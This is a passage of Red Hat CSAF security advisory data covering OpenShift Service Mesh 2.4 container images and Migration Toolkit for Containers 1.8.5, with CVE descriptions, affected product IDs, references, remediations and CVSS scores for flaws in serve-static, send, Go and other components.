"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
}
]
}
RHSA-2024_10906
Vulnerability from csaf_redhat - Published: 2024-12-10 01:37 - Updated: 2024-12-18 04:37Summary
Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update
Notes
Topic
The Migration Toolkit for Containers (MTC) 1.8.5 is now available.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
Details
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es) from Bugzilla:
* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)
* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* go/build/constraint: golang: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The Migration Toolkit for Containers (MTC) 1.8.5 is now available.\n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.\n\nSecurity Fix(es) from Bugzilla:\n\n* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n\n* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)\n\n* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion 